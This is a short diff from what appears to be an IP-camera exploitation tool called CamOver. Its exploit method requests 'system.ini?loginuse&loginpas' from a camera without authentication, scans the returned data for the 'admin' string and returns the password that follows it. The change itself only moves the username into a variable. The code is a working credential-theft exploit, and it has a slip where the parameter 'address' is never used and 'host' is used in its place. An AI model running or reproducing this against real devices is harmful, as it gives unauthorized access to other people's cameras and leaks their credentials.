| skipped 30 lines |
31 | 31 | | class CamOver: |
32 | 32 | | @staticmethod |
33 | 33 | | def exploit(address): |
| 34 | + | username = 'admin' |
| 35 | + | |
34 | 36 | | try: |
35 | 37 | | response = requests.get( |
36 | 38 | | f"http://{host}/system.ini?loginuse&loginpas", |
| skipped 5 lines |
42 | 44 | | |
43 | 45 | | if response.status_code == 200: |
44 | 46 | | strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text) |
45 | | - | if 'admin' in strings: |
46 | | - | username_index = strings.index('admin') |
| 47 | + | |
| 48 | + | if username in strings: |
| 49 | + | username_index = strings.index(username) |
47 | 50 | | password = strings[username_index + 1] |
| 51 | + | |
48 | 52 | | return 'admin', password |
49 | 53 | | |